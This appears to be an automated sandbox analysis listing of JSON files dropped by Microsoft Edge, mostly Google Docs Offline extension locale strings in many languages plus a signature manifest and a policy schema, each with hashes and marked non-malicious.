                                                                                                                                                                                                                                                        Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                        MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                        SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                        SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                        SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):980
                                                                                                                                                                                                                                                        Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                        MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                        SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                        SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                        SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1941
                                                                                                                                                                                                                                                        Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                        MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                        SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                        SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                        SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1969
                                                                                                                                                                                                                                                        Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                        MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                        SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                        SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                        SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1674
                                                                                                                                                                                                                                                        Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                        MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                        SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                        SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                        SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1063
                                                                                                                                                                                                                                                        Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                        MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                        SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                        SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                        SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                                                                        Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                        MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                        SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                        SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                        SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1263
                                                                                                                                                                                                                                                        Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                        MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                        SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                        SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                        SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1074
                                                                                                                                                                                                                                                        Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                        MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                        SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                        SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                        SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):879
                                                                                                                                                                                                                                                        Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                        MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                        SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                        SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                        SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                                                                        Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                        MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                        SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                        SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                        SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):843
                                                                                                                                                                                                                                                        Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                        MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                        SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                        SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                        SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                        Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):11280
                                                                                                                                                                                                                                                        Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                        MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                        SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                        SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                        SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                                                                        Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2525
                                                                                                                                                                                                                                                        Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                        MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                        SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                        SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                        SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                        Malicious:false
